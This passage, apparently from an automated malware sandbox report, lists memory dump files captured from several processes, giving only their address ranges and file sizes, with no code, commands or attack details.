                              • memory/1972-200-0x0000000000790000-0x00000000010AD000-memory.dmp

                                Filesize

                                9.1MB

                              • memory/1972-199-0x0000000000790000-0x00000000010AD000-memory.dmp

                                Filesize

                                9.1MB

                              • memory/1972-198-0x0000000000790000-0x00000000010AD000-memory.dmp

                                Filesize

                                9.1MB

                              • memory/1972-197-0x0000000000790000-0x00000000010AD000-memory.dmp

                                Filesize

                                9.1MB

                              • memory/1972-196-0x0000000000790000-0x00000000010AD000-memory.dmp

                                Filesize

                                9.1MB

                              • memory/1972-174-0x0000000000790000-0x00000000010AD000-memory.dmp

                                Filesize

                                9.1MB

                              • memory/1972-194-0x0000000000790000-0x00000000010AD000-memory.dmp

                                Filesize

                                9.1MB

                              • memory/1972-190-0x00007FF919010000-0x00007FF919205000-memory.dmp

                                Filesize

                                2.0MB

                              • memory/1972-192-0x00007FF916BE0000-0x00007FF916EA9000-memory.dmp

                                Filesize

                                2.8MB

                              • memory/1972-193-0x00007FF900000000-0x00007FF900002000-memory.dmp

                                Filesize

                                8KB

                              • memory/1972-191-0x00007FF900030000-0x00007FF900031000-memory.dmp

                                Filesize

                                4KB

                              • memory/2024-0-0x0000000000DF0000-0x0000000001445000-memory.dmp

                                Filesize

                                6.3MB

                              • memory/2820-15-0x0000000000B30000-0x0000000001185000-memory.dmp

                                Filesize

                                6.3MB

                              • memory/3316-145-0x0000000005250000-0x000000000526E000-memory.dmp

                                Filesize

                                120KB

                              • memory/3316-56-0x0000000007C70000-0x0000000007D02000-memory.dmp

                                Filesize

                                584KB

                              • memory/3316-146-0x0000000006B50000-0x0000000006D12000-memory.dmp

                                Filesize

                                1.8MB

                              • memory/3316-147-0x0000000007250000-0x000000000777C000-memory.dmp

                                Filesize

                                5.2MB

                              • memory/3316-80-0x0000000008730000-0x000000000883A000-memory.dmp

                                Filesize

                                1.0MB

                              • memory/3316-135-0x0000000008840000-0x00000000088A6000-memory.dmp

                                Filesize

                                408KB

                              • memory/3316-48-0x0000000000400000-0x000000000045A000-memory.dmp

                                Filesize

                                360KB

                              • memory/3316-122-0x00000000732D0000-0x0000000073A80000-memory.dmp

                                Filesize

                                7.7MB

                              • memory/3316-77-0x0000000007EB0000-0x0000000007EC2000-memory.dmp

                                Filesize

                                72KB

                              • memory/3316-54-0x00000000732D0000-0x0000000073A80000-memory.dmp

                                Filesize

                                7.7MB

                              • memory/3316-55-0x0000000008180000-0x0000000008724000-memory.dmp

                                Filesize

                                5.6MB

                              • memory/3316-144-0x0000000009D50000-0x0000000009DC6000-memory.dmp

                                Filesize

                                472KB

                              • memory/3316-75-0x0000000008D50000-0x0000000009368000-memory.dmp

                                Filesize

                                6.1MB

                              • memory/3316-57-0x0000000007E40000-0x0000000007E50000-memory.dmp

                                Filesize

                                64KB

                              • memory/3316-58-0x0000000007C50000-0x0000000007C5A000-memory.dmp

                                Filesize

                                40KB

                              • memory/3316-132-0x0000000007E40000-0x0000000007E50000-memory.dmp

                                Filesize

                                64KB

                              • memory/3316-88-0x0000000007F10000-0x0000000007F4C000-memory.dmp

                                Filesize

                                240KB

                              • memory/3316-206-0x00000000732D0000-0x0000000073A80000-memory.dmp

                                Filesize

                                7.7MB

                              • memory/3732-336-0x0000000001340000-0x0000000001360000-memory.dmp

                                Filesize

                                128KB

                              • memory/3732-339-0x00007FF623670000-0x00007FF623E5F000-memory.dmp

                                Filesize

                                7.9MB

                              • memory/3732-343-0x00007FF623670000-0x00007FF623E5F000-memory.dmp

                                Filesize

                                7.9MB

                              • memory/4508-127-0x0000000000410000-0x0000000000D2D000-memory.dmp

                                Filesize

                                9.1MB

                              • memory/4508-117-0x00007FF916BE0000-0x00007FF916EA9000-memory.dmp

                                Filesize

                                2.8MB

                              • memory/4508-143-0x00007FF916BE0000-0x00007FF916EA9000-memory.dmp

                                Filesize

                                2.8MB

                              • memory/4508-142-0x0000000000410000-0x0000000000D2D000-memory.dmp

                                Filesize

                                9.1MB

                              • memory/4508-114-0x0000000000410000-0x0000000000D2D000-memory.dmp

                                Filesize

                                9.1MB

                              • memory/4508-116-0x00007FF916BE0000-0x00007FF916EA9000-memory.dmp

                                Filesize

                                2.8MB

                              • memory/4508-134-0x0000000000410000-0x0000000000D2D000-memory.dmp

                                Filesize

                                9.1MB

                              • memory/4508-148-0x00007FF919010000-0x00007FF919205000-memory.dmp

                                Filesize

                                2.0MB

                              • memory/4508-119-0x00007FF916BE0000-0x00007FF916EA9000-memory.dmp

                                Filesize

                                2.8MB

                              • memory/4508-170-0x0000000000410000-0x0000000000D2D000-memory.dmp

                                Filesize

                                9.1MB

                              • memory/4508-118-0x00007FF916BE0000-0x00007FF916EA9000-memory.dmp

                                Filesize

                                2.8MB

                              • memory/4508-129-0x0000000000410000-0x0000000000D2D000-memory.dmp

                                Filesize

                                9.1MB

                              • memory/4508-120-0x00007FF900000000-0x00007FF900002000-memory.dmp

                                Filesize

                                8KB

                              • memory/4508-121-0x00007FF919010000-0x00007FF919205000-memory.dmp

                                Filesize

                                2.0MB

                              • memory/4508-175-0x00007FF916BE0000-0x00007FF916EA9000-memory.dmp

                                Filesize

                                2.8MB

                              • memory/4508-131-0x0000000000410000-0x0000000000D2D000-memory.dmp

                                Filesize

                                9.1MB

                              • memory/4508-176-0x00007FF919010000-0x00007FF919205000-memory.dmp

                                Filesize

                                2.0MB

                              • memory/4508-123-0x0000000000410000-0x0000000000D2D000-memory.dmp

                                Filesize

                                9.1MB

                              • memory/4508-124-0x00007FF900030000-0x00007FF900031000-memory.dmp

                                Filesize

                                4KB

                              • memory/4508-130-0x0000000000410000-0x0000000000D2D000-memory.dmp

                                Filesize

                                9.1MB

                              • memory/4508-125-0x0000000000410000-0x0000000000D2D000-memory.dmp

                                Filesize

                                9.1MB

                              • memory/4508-126-0x0000000000410000-0x0000000000D2D000-memory.dmp

                                Filesize

                                9.1MB

                              • memory/4508-128-0x0000000000410000-0x0000000000D2D000-memory.dmp

                                Filesize

                                9.1MB

                              • memory/4656-208-0x0000021905770000-0x0000021905780000-memory.dmp

                                Filesize

                                64KB

                              • memory/4656-212-0x00007FF8F99E0000-0x00007FF8FA4A1000-memory.dmp

                                Filesize

                                10.8MB

                              • memory/4656-168-0x0000021905770000-0x0000021905780000-memory.dmp

                                Filesize

                                64KB

                              • memory/4656-167-0x00007FF8F99E0000-0x00007FF8FA4A1000-memory.dmp

                                Filesize

                                10.8MB

                              • memory/4656-171-0x0000021905770000-0x0000021905780000-memory.dmp

                                Filesize

                                64KB

                              • memory/4656-187-0x0000021905770000-0x0000021905780000-memory.dmp

                                Filesize

                                64KB

                              • memory/4656-207-0x0000021905770000-0x0000021905780000-memory.dmp

                                Filesize

                                64KB

                              • memory/4656-211-0x0000021905770000-0x0000021905780000-memory.dmp

                                Filesize

                                64KB

                              • memory/4752-228-0x000001C159260000-0x000001C1592A0000-memory.dmp

                                Filesize

                                256KB

                              • memory/4752-234-0x000001C159970000-0x000001C159971000-memory.dmp

                                Filesize

                                4KB

                              • memory/5004-338-0x00007FF6ADCD0000-0x00007FF6ADCFA000-memory.dmp

                                Filesize

                                168KB

                              • memory/5012-162-0x00000228F7AA0000-0x00000228F7AB0000-memory.dmp

                                Filesize

                                64KB

                              • memory/5012-159-0x00007FF8F99E0000-0x00007FF8FA4A1000-memory.dmp

                                Filesize

                                10.8MB

                              • memory/5012-160-0x00000228F7AA0000-0x00000228F7AB0000-memory.dmp

                                Filesize

                                64KB

                              • memory/5012-154-0x00000228F79E0000-0x00000228F7A02000-memory.dmp

                                Filesize

                                136KB

                              • memory/5012-161-0x00000228F7AA0000-0x00000228F7AB0000-memory.dmp

                                Filesize

                                64KB

                              • memory/5012-164-0x00007FF8F99E0000-0x00007FF8FA4A1000-memory.dmp

                                Filesize

                                10.8MB